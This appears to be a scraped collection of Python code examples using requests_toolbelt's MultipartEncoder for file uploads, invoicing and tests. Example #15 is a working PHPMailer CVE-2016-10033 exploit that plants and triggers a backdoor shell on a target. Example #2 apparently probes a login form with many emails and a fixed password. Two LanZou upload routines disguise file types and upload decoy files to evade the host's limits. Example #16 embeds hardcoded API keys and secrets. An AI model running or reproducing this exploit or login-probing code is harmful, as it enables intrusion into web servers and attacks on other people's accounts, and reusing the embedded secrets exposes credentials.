Пример #1
0
def upload_photo(self, photo, caption=None, upload_id=None):
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    if not compatible_aspect_ratio(get_image_size(photo)):
        self.logger.info('Photo does not have a compatible '
                         'photo aspect ratio.')
        return False
    data = {
        'upload_id': upload_id,
        '_uuid': self.uuid,
        '_csrftoken': self.token,
        'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}',
        'photo': ('pending_media_%s.jpg' % upload_id, open(photo, 'rb'), 'application/octet-stream', {'Content-Transfer-Encoding': 'binary'})
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({'X-IG-Capabilities': '3Q4=',
                                 'X-IG-Connection-Type': 'WIFI',
                                 'Cookie2': '$Version=1',
                                 'Accept-Language': 'en-US',
                                 'Accept-Encoding': 'gzip, deflate',
                                 'Content-type': m.content_type,
                                 'Connection': 'close',
                                 'User-Agent': self.user_agent})
    response = self.session.post(
        config.API_URL + "upload/photo/", data=m.to_string())
    if response.status_code == 200:
        if self.configure_photo(upload_id, photo, caption):
            self.expose()
            return True
    return False
Пример #2
0
def postold(csrfmiddle, cookie, mail):
	url = "https://ad.toutiao.com/old_login/"

	files = {
		"csrfmiddlewaretoken":(None, str(csrfmiddle)),
		"email":(None, str(mail)),
		"password":(None, "9090"),
	}


	from requests_toolbelt import MultipartEncoder
	
	m = MultipartEncoder(fields=files, boundary="----WebKitFormBoundaryRgFdemk5CNNZaY6j")

	headers = {
		'Accept':'*/*',
		'Accept-Encoding':'gzip, deflate, br',
		'Accept-Language':'en-US,en;q=0.8,zh;q=0.6',
		'Connection':'keep-alive',
		'Content-Type':m.content_type,
		'Host':'ad.toutiao.com',
		'Cookie':cookie,
		'Origin':'https://ad.toutiao.com',
		'Referer':'https://ad.toutiao.com/old_login/',
		'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
		'X-Requested-With':'XMLHttpRequest',
	}

	r = ss.post(url, headers=headers, data=m.to_string(), verify=False)
	pp = json.loads(r.text)
	#print  pp
	if pp['code'] == 1009:
		print mail, "....", r.text
Пример #3
0
 def save(self,cnxml):
     """Push new cnxml to RME"""
     data = MultipartEncoder(fields={'importFile':('index.cnxml', cnxml.decode('utf-8')),
         'format':'plain', 'submit':'Import', 'form.submitted':'1',
         'came_from':'module_text'})
     r = requests.post('%s/module_import_form' % self.url, data = data.to_string(), 
         auth = self.auth, headers = {'Content-Type': data.content_type})
Пример #4
0
    def _upload_artifact(self, local_artifact, path_prefix, repo_id, hostname_for_download=None, use_direct_put=False):

        filename = os.path.basename(local_artifact.local_path)
        logger.info('-> Uploading %s', filename)
        logger.debug('local artifact: %s', local_artifact)

        # rgavf stands for repo-group-local_artifact-version-filename
        gavf = '{group}/{name}/{ver}/{filename}'.format(group=local_artifact.group.replace('.', '/'),
                                                        name=local_artifact.artifact, ver=local_artifact.version,
                                                        filename=filename)
        rgavf = '{repo_id}/{gavf}'.format(repo_id=repo_id, gavf=gavf)

        with open(local_artifact.local_path, 'rb') as f:
            if not use_direct_put:
                data = {
                    'g':local_artifact.group,
                    'a':local_artifact.artifact,
                    'v':local_artifact.version,
                    'r':repo_id,
                    'e': local_artifact.extension,
                    'p': local_artifact.extension,
                    'hasPom': 'false'
                }


                data_list = data.items()
                data_list.append( ('file', (filename, f, 'text/plain') ))
                m_for_logging = MultipartEncoder(fields=data_list)
                logger.debug('payload: %s', m_for_logging.to_string())

                f.seek(0)
                m = MultipartEncoder(fields=data_list)
                headers = {'Content-Type': m.content_type}

                self._send('service/local/artifact/maven/content', method='POST', data=m, headers=headers)

                result = RemoteArtifact(group=local_artifact.group, artifact=local_artifact.artifact,
                                      version=local_artifact.version, classifier=local_artifact.classifier,
                                      extension=local_artifact.extension, repo_id=repo_id)
                self.resolve_artifact(result)
                return result

            else:
                headers = {'Content-Type': 'application/x-rpm'}
                remote_path = '{path_prefix}/{rgavf}'.format(path_prefix=path_prefix, rgavf=rgavf)
                self._send(remote_path, method='PUT', headers=headers, data=f)

                # if not specified, use repository url
                hostname_for_download = hostname_for_download or self._repository_url
                url = '{hostname}/content/repositories/{rgavf}'.format(hostname=hostname_for_download, rgavf=rgavf)

                # get classifier and extension from nexus
                path = 'service/local/repositories/{repo_id}/content/{gavf}?describe=maven2'.format(repo_id=repo_id, gavf=gavf)
                maven_metadata = self._send_json(path)['data']

                return RemoteArtifact(group=maven_metadata['groupId'], artifact=maven_metadata['artifactId'],
                                      version=maven_metadata['version'], classifier=maven_metadata.get('classifier', ''),
                                      extension=maven_metadata.get('extension', ''), url=url, repo_id=repo_id)
    def test_encoding(self):
        """Test MultipartEncoder encoding"""
        with SubsetIO(self.fd, 1, 64) as fd:
            encoder = MultipartEncoder(
                fields={'file': (
                    "filename", fd, 'application/octet-stream'
                )}
            )

            data = encoder.read()
            self.assertTrue(len(data) > 0)
Пример #6
0
def test_multipart_encoder_interleave():
    pair = ("tests/data/files/test_R1_L001.fq.gz", "tests/data/files/test_R2_L001.fq.gz")
    fname, fsize, fformat = _file_stats(pair)
    wrapper = FASTXInterleave(pair, fsize, fformat)
    wrappertext = wrapper.read()
    wrapper.seek(0)

    assert len(wrappertext) == fsize

    multipart_fields = OrderedDict()
    multipart_fields["file"] = ("fakefile", wrapper, "text/plain")
    encoder = MultipartEncoder(multipart_fields)
    MAGIC_HEADER_LEN = 170  # shorter because of text/plain mime-type
    encodertext = encoder.read()
    assert len(encodertext) - MAGIC_HEADER_LEN == len(wrappertext)
Пример #7
0
def test_multipart_encoder_passthru():
    wrapper = FilePassthru(
        "tests/data/files/test_R1_L001.fq.bz2",
        os.path.getsize("tests/data/files/test_R1_L001.fq.bz2"),
    )
    wrapper_len = len(wrapper.read())
    wrapper.seek(0)

    assert wrapper_len == wrapper._fsize

    multipart_fields = OrderedDict()
    multipart_fields["file"] = ("fakefile", wrapper, "application/x-gzip")
    encoder = MultipartEncoder(multipart_fields)
    MAGIC_HEADER_LEN = 178
    wrapper.seek(0)
    assert len(encoder.read()) - MAGIC_HEADER_LEN == wrapper_len
Пример #8
0
    def test_post_file_error(self):
        file = StringIO('sample_name\tbarcode\nSample 1\t000000001\n')
        m = MultipartEncoder(
            fields={
                'sample-set': 'Sample Set 1',
                'type': 'test',
                'location': 'the freezer',
                'file': ('test_bc.txt', file, 'text/plain')}
        )

        self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0)
        obs = self.post('/sample/add/', m.to_string(),
                        headers={'Content-Type': m.content_type})
        self.assertEqual(obs.code, 200)
        self.assertIn('The object with name \'Sample 1\' already exists in '
                      'table \'sample\'', obs.body.decode('utf-8'))
        self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0)
Пример #9
0
    def test_post_file(self):
        file = StringIO('sample_name\tother_col\ntest1\tval1\ntest2\tval2\n')
        m = MultipartEncoder(
            fields={
                'sample-set': 'Sample Set 1',
                'type': 'test',
                'location': 'the freezer',
                'file': ('test_bc.txt', file, 'text/plain')}
        )

        self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0)
        obs = self.post('/sample/add/', m.to_string(),
                        headers={'Content-Type': m.content_type})
        self.assertEqual(obs.code, 200)
        self.assertIn('Created 2 samples from test_bc.txt',
                      obs.body.decode('utf-8'))
        self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 2)
Пример #10
0
def facturar_rep(factura_id):
    logger.info('Task facturar iniciada')

    # Configurar redondeo
    getcontext().rounding = ROUND_HALF_UP

    # Calcular fecha actual
    fecha = timezone.localtime()

    # Consultar contrato
    factura = models.Factura.objects.get(id=factura_id)

    # Calcular impuestos

    # Cargar certificado CSD
    cer = X509.load_cert(settings.CSD_CER, X509.FORMAT_DER)

    # Cargar llave privada CSD
    key = RSA.load_key(settings.CSD_KEY)

    # Obtener numero de serie
    serial_number = '{:x}'.format(int(cer.get_serial_number())).decode('hex')

    # Obtener folio
    folio_conf = models.Configuracion.objects.get(nombre='U_FOLIO')
    folio_conf.valor = folio_conf.valor + 1
    folio_conf.save()

    nsmap = {
        'cfdi': 'http://www.sat.gob.mx/cfd/3',
        'xsi': 'http://www.w3.org/2001/XMLSchema-instance',
        'pago10': 'http://www.sat.gob.mx/Pagos',
    }

    attrib = {
        '{http://www.w3.org/2001/XMLSchema-instance}schemaLocation':
        'http://www.sat.gob.mx/cfd/3 http://www.sat.gob.mx/sitio_internet/cfd/3/cfdv33.xsd http://www.sat.gob.mx/Pagos http://www.sat.gob.mx/sitio_internet/cfd/Pagos/Pagos10.xsd'
    }

    # Nodo cfdi:Comprobante
    cfdi = etree.Element('{http://www.sat.gob.mx/cfd/3}Comprobante',
                         nsmap=nsmap,
                         attrib=attrib)

    cfdi.set('Version', '3.3')
    cfdi.set('Serie', settings.SERIE_REP)
    cfdi.set('Folio', str(folio_conf.valor))
    cfdi.set('Fecha', fecha.isoformat()[:19])
    cfdi.set('NoCertificado', serial_number)
    cfdi.set('Certificado', base64.b64encode(cer.as_der()))
    cfdi.set('SubTotal', '0')
    cfdi.set('Moneda', 'XXX')
    cfdi.set('Total', '0')
    cfdi.set('TipoDeComprobante', 'P')
    cfdi.set('LugarExpedicion', settings.CODIGO_POSTAL)

    # Nodo cfdi:Emisor
    emisor = etree.SubElement(cfdi, '{http://www.sat.gob.mx/cfd/3}Emisor')
    emisor.set('Rfc', settings.RFC)
    emisor.set('Nombre', settings.RAZON_SOCIAL)
    emisor.set('RegimenFiscal', settings.REGIMEN_FISCAL)

    # Nodo cfdi:Receptor
    receptor = etree.SubElement(cfdi, '{http://www.sat.gob.mx/cfd/3}Receptor')
    receptor.set('Rfc', factura.rfc_cliente)
    receptor.set('Nombre', factura.nombre_cliente)
    receptor.set('UsoCFDI', 'P01')

    # Nodo cfdi:Conceptos
    conceptos = etree.SubElement(cfdi,
                                 '{http://www.sat.gob.mx/cfd/3}Conceptos')

    # Nodo cfdi:Concepto
    concepto = etree.SubElement(conceptos,
                                '{http://www.sat.gob.mx/cfd/3}Concepto')
    concepto.set('ClaveProdServ', '84111506')
    concepto.set('Cantidad', '1')
    concepto.set('ClaveUnidad', 'ACT')
    concepto.set('Descripcion', 'Pago')
    concepto.set('ValorUnitario', '0.000000')
    concepto.set('Importe', '0.00')

    # Nodo cfdi:Conceptos
    complemento = etree.SubElement(cfdi,
                                   '{http://www.sat.gob.mx/cfd/3}Complemento')

    # Nodo pago10:Pagos
    pagos = etree.SubElement(complemento, '{http://www.sat.gob.mx/Pagos}Pagos')
    pagos.set('Version', '1.0')

    # Nodo pago10:Pagos
    pago = etree.SubElement(pagos, '{http://www.sat.gob.mx/Pagos}Pago')
    pago.set('FechaPago', '{}T01:00:00'.format(factura.fecha_pago.isoformat()))
    pago.set('FormaDePagoP', factura.forma_pago_rep)
    pago.set('MonedaP', settings.MONEDA)
    pago.set('Monto', '{}'.format(factura.total))
    pago.set('NumOperacion', factura.num_operacion)

    # Nonda pago10:DoctoRelacionado
    docto_relacionado = etree.SubElement(
        pago, '{http://www.sat.gob.mx/Pagos}DoctoRelacionado')
    docto_relacionado.set('IdDocumento', '{}'.format(factura.uuid))
    docto_relacionado.set('Serie', factura.serie)
    docto_relacionado.set('Folio', '{}'.format(factura.folio))
    docto_relacionado.set('MonedaDR', settings.MONEDA)
    docto_relacionado.set('MetodoDePagoDR', factura.contrato.metodo_pago)
    docto_relacionado.set('NumParcialidad', '1')
    docto_relacionado.set('ImpSaldoAnt', '{}'.format(factura.total))
    docto_relacionado.set('ImpPagado', '{}'.format(factura.total))
    docto_relacionado.set('ImpSaldoInsoluto', '0')

    # Cargar xslt para generar cadena original
    xslt = etree.XSLT(etree.parse(settings.PATH_XLST))

    # Generar cadena original
    cadena_original = xslt(cfdi)

    # sacar hash a cadena original
    digest = hashlib.new('sha256', str(cadena_original)).digest()

    # Firmar digest de cadena original
    sign = key.sign(digest, "sha256")

    # Pasar sello de Bytes a b64
    sello = base64.b64encode(sign)

    # Agrefar sello a documento xml
    cfdi.set('Sello', sello)

    # Generar archivo xml
    xml = etree.tostring(cfdi, pretty_print=True)

    # Format token
    token = 'bearer %s' % str(settings.PAC_TOKEN)

    # Crear mensaje multiparte para adjuntar archivo
    m = MultipartEncoder(fields={
        'xml': ('xml', xml, 'text/xml', {
            'Content-Transfer-Encoding': 'binary'
        })
    })

    # Crear headers
    headers = {'Content-Type': m.content_type, 'Authorization': token}

    # Realizar request tipo post al pac
    req = requests.post(settings.PAC_URL, headers=headers, data=m.to_string())

    # Verificar request
    if req.status_code != 200:
        raise Exception(u'id_factura: {} Error {}'.format(
            factura.id, req.json()))

    # Extraer xml
    xml_timbrado = req.json()['data']['cfdi'].encode('utf-8')

    # Parsear XML timpado
    cfdi_timbrado = etree.fromstring(xml_timbrado)

    # Buscar UUID
    uuid = cfdi_timbrado.find('{http://www.sat.gob.mx/cfd/3}Complemento').find(
        '{http://www.sat.gob.mx/TimbreFiscalDigital}TimbreFiscalDigital'
    ).attrib.get('UUID')

    # Generar PDF
    xml_dict = xmltodict.parse(xml_timbrado)['cfdi:Comprobante']

    cbb_url = 'https://verificacfdi.facturaelectronica.sat.gob.mx/' \
              'default.aspx?id={0}re={1}&rr={2}&tt={3}&fe={4}'.format(
        uuid,
        settings.RFC,
        factura.rfc_cliente,
        factura.total,
        sello[(len(sello) - 8):],
    )

    # Generar codigo qr de cbb
    qrdata = qrcode.make(cbb_url)
    raw = StringIO()
    qrdata.save(raw)
    cbb = b64encode(raw.getvalue())

    # Renderizar HTML
    html = get_template('webapp/factura-pago-pdf.html').render({
        'xml':
        xml_dict,
        'cadena_original':
        cadena_original,
        'cbb':
        cbb,
    })

    # Generar PDF
    pdf = pdfkit.from_string(html,
                             False,
                             options={
                                 'page-size': 'Letter',
                                 'encoding': "UTF-8",
                                 'quiet': '',
                             })

    # Guardar factura en base de datos
    factura.uuid_rep = uuid
    factura.xml_rep = ContentFile(xml_timbrado, name='{0}.xml'.format(uuid))
    factura.pdf_rep = ContentFile(pdf, name='{0}.pdf'.format(uuid))
    factura.save()

    # Enviar correo
    html_email = get_template('webapp/factura-correo.txt').render(
        {'factura': factura})

    msg = EmailMessage('{} Nuevo REP {} {} Generada'.format(
        settings.RAZON_SOCIAL, factura.serie, factura.folio),
                       html_email,
                       settings.DEFAULT_FROM_EMAIL,
                       to=[factura.correo_cliente],
                       reply_to=[settings.TENANT_EMAIL],
                       cc=[settings.TENANT_EMAIL])
    msg.attach('{}_{}.xml'.format(factura.serie, factura.folio),
               factura.xml.read(), 'application/xml')
    msg.attach('{}_{}.pdf'.format(factura.serie, factura.folio),
               factura.pdf.read(), 'application/pdf')

    msg.attach('{}_{}.xml'.format(factura.serie, factura.folio),
               factura.xml_rep.read(), 'application/xml')
    msg.attach('{}_{}.pdf'.format(factura.serie, factura.folio),
               factura.pdf_rep.read(), 'application/pdf')
    msg.send()

    logger.info('Task facturar terminada')

    return factura.id
Пример #11
0
    def _upload_a_file(self, file_path, folder_id=-1, call_back=None):
        """上传文件到蓝奏云上指定的文件夹(默认根目录)"""
        if not os.path.exists(file_path):
            return LanZouCloud.FAILED
        file_name = re.sub(
            r'\s', '_',
            os.path.basename(file_path))  # 从文件路径截取文件名,去除空白字符(Linux文件名限制)
        tmp_list = {
            **self.get_file_list2(folder_id),
            **self.get_dir_list(folder_id)
        }
        if file_name in tmp_list.keys():
            self.delete(tmp_list[file_name])  # 文件已经存在就删除

        suffix = file_name.split(".")[-1]
        valid_suffix_list = [
            'doc', 'docx', 'zip', 'rar', 'apk', 'ipa', 'txt', 'exe', '7z', 'e',
            'z', 'ct', 'ke', 'cetrainer', 'db', 'tar', 'pdf', 'w3x', 'epub',
            'mobi', 'azw', 'azw3', 'osk', 'osz', 'xpa', 'cpk', 'lua', 'jar',
            'dmg', 'ppt', 'pptx', 'xls', 'xlsx', 'mp3', 'iso', 'img', 'gho',
            'ttf', 'ttc', 'txf', 'dwg', 'bat', 'dll'
        ]
        # 不支持上传的格式,通过修改后缀蒙混过关
        if suffix not in valid_suffix_list:
            file_name = file_name + self._guise_suffix

        # 分卷后缀 .part[0-9]+.rar 被蓝奏云限制上传,改一下命名规则
        # .part[0-9]+.rar 改成 .xxx[0-9]+.rar 仍可以解压,以此绕过蓝奏云的检测
        if suffix == 'rar' and 'part' in file_name.split(".")[-2]:
            file_name = file_name.replace('.part', f'.{self._rar_part_name}')
        logger.debug(
            f'Upload file {file_path} to folder ID#{folder_id} as "{file_name}"'
        )

        post_data = {
            "task":
            "1",
            "folder_id":
            str(folder_id),
            "id":
            "WU_FILE_0",
            "name":
            file_name,
            "upload_file": (file_name, open(file_path,
                                            'rb'), 'application/octet-stream')
        }

        post_data = MultipartEncoder(post_data)
        tmp_header = self._headers.copy()
        tmp_header['Content-Type'] = post_data.content_type
        # 让回调函数里不显示伪装后缀名
        if file_name.endswith(self._guise_suffix):
            file_name = file_name.replace(self._guise_suffix, '')
        # MultipartEncoderMonitor 每上传 8129 bytes数据调用一次回调函数,问题根源是 httplib 库
        # issue : https://github.com/requests/toolbelt/issues/75
        # 上传完成后,回调函数会被错误的多调用一次(强迫症受不了)。因此,下面重新封装了回调函数,修改了接受的参数,并阻断了多余的一次调用
        self._upload_finished_flag = False  # 上传完成的标志

        def _call_back(read_monitor):
            if call_back is not None:
                if not self._upload_finished_flag:
                    call_back(file_name, read_monitor.len,
                              read_monitor.bytes_read)
                if read_monitor.len == read_monitor.bytes_read:
                    self._upload_finished_flag = True

        try:
            monitor = MultipartEncoderMonitor(post_data, _call_back)
            result = self._session.post('http://pc.woozooo.com/fileup.php',
                                        data=monitor,
                                        headers=tmp_header).json()
            if result["zt"] == 0: return LanZouCloud.FAILED  # 上传失败
            file_id = result["text"][0]["id"]
            # 蓝奏云禁止用户连续上传 100M 的文件,因此需要上传一个 100M 的文件,然后上传一个“假文件”糊弄过去
            # 这里检查上传的文件是否为“假文件”,是的话上传后就立刻删除
            if result['text'][0]['name_all'].startswith(
                    self._fake_file_prefix):
                self.delete(file_id)
            else:
                self.set_share_passwd(file_id)  # 正常的文件上传后默认关闭提取码
            return LanZouCloud.SUCCESS
        except (requests.RequestException, KeyboardInterrupt):
            return LanZouCloud.FAILED
Пример #12
0
import requests
from requests_toolbelt import MultipartEncoder

if __name__ == '__main__':
    content_dict = {}
    content_dict['image'] = ("big_image.png",
                             open("/workdir/src/big_image.jpg",
                                  'rb'), 'image/*')
    content_dict['mode'] = (
        "mode", open('/workdir/src/sliding_window_mode_example.json', 'rb'))

    encoder = MultipartEncoder(fields=content_dict)
    response = requests.post("http://0.0.0.0:5000/model/inference",
                             data=encoder,
                             headers={'Content-Type': encoder.content_type})
    print(response.json())
Пример #13
0
    def _upload_a_file(self, file_path, folder_id=-1, call_back=None) -> int:
        """上传文件到蓝奏云上指定的文件夹(默认根目录)"""
        if not os.path.isfile(file_path):
            return LanZouCloud.PATH_ERROR
        file_name = os.path.basename(file_path)  # 从文件路径截取文件名
        try:
            tmp_list = {**self.get_file_id_list(folder_id), **self.get_dir_id_list(folder_id)}
            if file_name in tmp_list.keys():
                self.delete(tmp_list[file_name])  # 文件已经存在就删除
        except TimeoutError:
            return LanZouCloud.NETWORK_ERROR

        suffix = file_name.split(".")[-1]
        valid_suffix_list = ['doc', 'docx', 'zip', 'rar', 'apk', 'ipa', 'txt', 'exe', '7z', 'e', 'z', 'ct',
                             'ke', 'cetrainer', 'db', 'tar', 'pdf', 'w3x', 'epub', 'mobi', 'azw', 'azw3',
                             'osk', 'osz', 'xpa', 'cpk', 'lua', 'jar', 'dmg', 'ppt', 'pptx', 'xls', 'xlsx',
                             'mp3', 'iso', 'img', 'gho', 'ttf', 'ttc', 'txf', 'dwg', 'bat', 'dll']
        # 不支持上传的格式,通过修改后缀蒙混过关
        if suffix not in valid_suffix_list:
            file_name = file_name.replace('.', '#')  # 官方限制了dll文件名中出现多重后缀,用 "#" .
            file_name = file_name + self._guise_suffix

        # 分卷后缀 .part[0-9]+.rar 被蓝奏云限制上传,改一下命名规则
        # .part[0-9]+.rar 改成 .xxx[0-9]+.rar 仍可以解压,以此绕过蓝奏云的检测
        if suffix == 'rar' and 'part' in file_name.split(".")[-2]:
            file_name = file_name.replace('.part', f'.{self._rar_part_name}')
        logger.debug(f'Upload file {file_path} to folder ID#{folder_id} as "{file_name}"')
        with open(file_path, 'rb') as _file_handle:
            post_data = {
                "task": "1",
                "folder_id": str(folder_id),
                "id": "WU_FILE_0",
                "name": file_name,
                "upload_file": (file_name, _file_handle, 'application/octet-stream')
            }
            post_data = MultipartEncoder(post_data)
            tmp_header = self._headers.copy()
            tmp_header['Content-Type'] = post_data.content_type
            # 让回调函数里不显示伪装后缀名
            file_name, _ = self._get_right_name(file_name)

            # MultipartEncoderMonitor 每上传 8129 bytes数据调用一次回调函数,问题根源是 httplib 库
            # issue : https://github.com/requests/toolbelt/issues/75
            # 上传完成后,回调函数会被错误的多调用一次(强迫症受不了)。因此,下面重新封装了回调函数,修改了接受的参数,并阻断了多余的一次调用
            self._upload_finished_flag = False  # 上传完成的标志

            def _call_back(read_monitor):
                if call_back is not None:
                    if not self._upload_finished_flag:
                        call_back(file_name, read_monitor.len, read_monitor.bytes_read)
                    if read_monitor.len == read_monitor.bytes_read:
                        self._upload_finished_flag = True

            monitor = MultipartEncoderMonitor(post_data, _call_back)
            result = self._POST('https://pc.woozooo.com/fileup.php', data=monitor, headers=tmp_header)
            if not result:  # 网络异常
                return LanZouCloud.NETWORK_ERROR
            else:
                result = result.json()
            if result["zt"] != 1:
                logger.warning(f'Upload failed: {result}')
                return LanZouCloud.FAILED  # 上传失败

            # 蓝奏云禁止用户连续上传 100M 的文件,因此需要上传一个 100M 的文件,然后上传一个“假文件”糊弄过去
            # 这里检查上传的文件是否为“假文件”,是的话上传后就立刻删除
            file_id = result["text"][0]["id"]
            if result['text'][0]['name_all'].startswith(self._fake_file_prefix):
                self.delete(file_id)
                self.delete_rec(file_id)
            else:
                self.set_passwd(file_id)  # 文件上传后默认关闭提取码
            return LanZouCloud.SUCCESS
Пример #14
0
def _upload_source(ctx,
                   username,
                   id,
                   features,
                   no_validation,
                   quiet,
                   replace,
                   token=None,
                   indent=None):
    """Create/add a tileset source

    tilesets add-source <username> <id> <path/to/source/data>
    """
    mapbox_api = utils._get_api()
    mapbox_token = utils._get_token(token)
    s = utils._get_session()
    url = (
        f"{mapbox_api}/tilesets/v1/sources/{username}/{id}?access_token={mapbox_token}"
    )

    method = "post"
    if replace:
        method = "put"

    # This does the decoding by hand instead of using pyjwt because
    # pyjwt rejects tokens that don't pad the base64 with = signs.
    token_parts = mapbox_token.split(".")
    if len(token_parts) < 2:
        raise errors.TilesetsError(
            f"Token {mapbox_token} does not contain a payload component")
    else:
        while len(token_parts[1]) % 4 != 0:
            token_parts[1] = token_parts[1] + "="
        body = json.loads(base64.b64decode(token_parts[1]))
        if "u" in body:
            if username != body["u"]:
                raise errors.TilesetsError(
                    f"Token username {body['u']} does not match username {username}"
                )
        else:
            raise errors.TilesetsError(
                f"Token {mapbox_token} does not contain a username")

    with tempfile.TemporaryFile() as file:
        for feature in features:
            if not no_validation:
                utils.validate_geojson(feature)

            file.write((json.dumps(feature, separators=(",", ":")) +
                        "\n").encode("utf-8"))

        file.seek(0)
        m = MultipartEncoder(fields={"file": ("file", file)})

        if quiet:
            resp = getattr(s, method)(
                url,
                data=m,
                headers={
                    "Content-Disposition": "multipart/form-data",
                    "Content-type": m.content_type,
                },
            )
        else:
            prog = click.progressbar(length=m.len,
                                     fill_char="=",
                                     width=0,
                                     label="upload progress")
            with prog:

                def callback(m):
                    prog.pos = m.bytes_read
                    prog.update(0)  # Step is 0 because we set pos above

                monitor = MultipartEncoderMonitor(m, callback)
                resp = getattr(s, method)(
                    url,
                    data=monitor,
                    headers={
                        "Content-Disposition": "multipart/form-data",
                        "Content-type": monitor.content_type,
                    },
                )

    if resp.status_code == 200:
        click.echo(json.dumps(resp.json(), indent=indent))
    else:
        raise errors.TilesetsError(resp.text)
Пример #15
0
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
print("██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
print("╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")

target = 'http://*****:*****@protonmail.com',
        'message': 'Pwned'}

m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')

headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}

proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}


print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)
Пример #16
0
from requests_toolbelt import MultipartEncoder
import requests
import os, sys


dir="/Users/wywy/Desktop/text_image/"
dir1="/Users/wywy/Desktop/json/"
b=0
for ii in os.listdir(dir):
    b+=1
    m = MultipartEncoder(
        fields={
            'APPID':'1256752352',
            'api_key': '84mHZfjcIl26yd6LNDpEQPBl7GEyUnuo',
            'api_secret': 'AKIDazBByYh63nKgplG1LSL1TmskQs8BEe4H',
            # 'image_file': ('filename', open('./timg.jpg', 'rb'), 'image/png')
            'image_file': ('filename', open(str(dir+str(ii)), 'rb'), 'image/png')
        })

    r = requests.post('http://recognition.image.myqcloud.com/ocr/handwriting', data=m,
                      headers={'Content-Type': m.content_type})

    d=r.content
    # print(r.content,'11')
    # print(type(r),'22')
    # print(type(r.json()),'33')
    # print(r.json(),'44')
    a=r.json()
# 创建空文件
    arr=ii.split(".")
    text=str(arr[0]+".json")
Пример #17
0
    def _upload_video(self, video_file, callback, session, proxy):

        upload_path = self._get_path_to_upload()
        go_to_upload = session.get(upload_path, proxies=proxy)

        upload_form_url = self._get_path_to_users_upload()

        session.headers.update({'X-Requested-With': 'XMLHttpRequest'})
        get_upload_form = session.get(upload_form_url,
                                      proxies=proxy,
                                      verify=False)

        regex_api_key = r'var\s+kumm_api_key\s+=\s+"(.*?)"'
        regex_user_id = r'var\s+user_id\s+=\s+"(.*?)"'
        regex_callback_url = r'var\s+callback_url\s+=\s+"(.*?)"'

        found_api_key = re.search(regex_api_key, get_upload_form.content)
        found_user_id = re.search(regex_user_id, get_upload_form.content)
        found_callback_url = re.search(regex_callback_url,
                                       get_upload_form.content)

        if not found_api_key:
            raise KummProblem('Could not find api_key')
        if not found_user_id:
            raise KummProblem('Could not find user_id')
        if not found_callback_url:
            raise KummProblem('Could not find callback_url')

        api_key = found_api_key.group(1)
        user_id = found_user_id.group(1)
        callback_url = found_callback_url.group(1)

        doc = etree.fromstring(get_upload_form.content, HTMLParser())
        get_upload_url = doc.xpath('//input[@id="fileupload"]/@data-url')

        if len(get_upload_url) == 0:
            raise KummProblem(
                'Could not find kumm posting url for the video upload')

        posting_url = get_upload_url[0]
        session.options(posting_url, proxies=proxy, verify=False)

        fields = []
        fields.append(('token', api_key))
        fields.append(('callBackUrl', callback_url))
        fields.append(('website', self.website))
        fields.append(('userId', user_id))
        fields.append(
            ('files[]', (path.Path(video_file).name, open(video_file, 'rb'))))

        encoder = MultipartEncoder(fields)
        if callback:
            monitor = MultipartEncoderMonitor(encoder, callback)
        else:
            monitor = MultipartEncoderMonitor(encoder)

        submit_upload = session.post(
            posting_url,
            data=monitor,
            headers={'Content-Type': monitor.content_type},
            proxies=proxy,
            verify=False)
        try:
            response = submit_upload.json()
        except:
            raise KummProblem(
                'Expecting json, did not receive json after video uploading')
        else:
            if 'err' in response:
                raise KummProblem(
                    'Kumm uploader experienced an error after uploading:{err}'.
                    format(err=response['err']))
            elif 'uuid' in response:
                return response['uuid']
Пример #18
0
    def serve_model(
        self,
        model,
        model_id: str = None,
        mpc: bool = False,
        allow_download: bool = False,
        allow_remote_inference: bool = False,
    ):
        """ Hosts the model and optionally serve it using a Socket / Rest API.

        Args:
            model : A jit model or Syft Plan.
            model_id (str): An integer/string representing the model id.
            If it isn't provided and the model is a Plan we use model.id,
            if the model is a jit model we raise an exception.
            allow_download (bool) : Allow to copy the model to run it locally.
            allow_remote_inference (bool) : Allow to run remote inferences.
        Returns:
            result (bool) : True if model was served sucessfully.
        Raises:
            ValueError: model_id isn't provided and model is a jit model.
            RunTimeError: if there was a problem during model serving.
        """

        # If the model is a Plan we send the model
        # and host the plan version created after
        # the send action
        if isinstance(model, Plan):
            # We need to use the same id in the model
            # as in the POST request.
            pointer_model = model.send(self)
            res_model = pointer_model
        else:
            res_model = model

        serialized_model = serialize(res_model).decode(self.encoding)

        message = {
            REQUEST_MSG.TYPE_FIELD: REQUEST_MSG.HOST_MODEL,
            "encoding": self.encoding,
            "model_id": model_id,
            "allow_download": str(allow_download),
            "mpc": str(mpc),
            "allow_remote_inference": str(allow_remote_inference),
            "model": serialized_model,
        }

        url = self.address.replace("ws", "http") + "/serve-model/"

        # Multipart encoding
        form = MultipartEncoder(message)
        upload_size = form.len

        # Callback that shows upload progress
        def progress_callback(monitor):
            upload_progress = "{} / {} ({:.2f} %)".format(
                monitor.bytes_read, upload_size,
                (monitor.bytes_read / upload_size) * 100)
            print(upload_progress, end="\r")
            if monitor.bytes_read == upload_size:
                print()

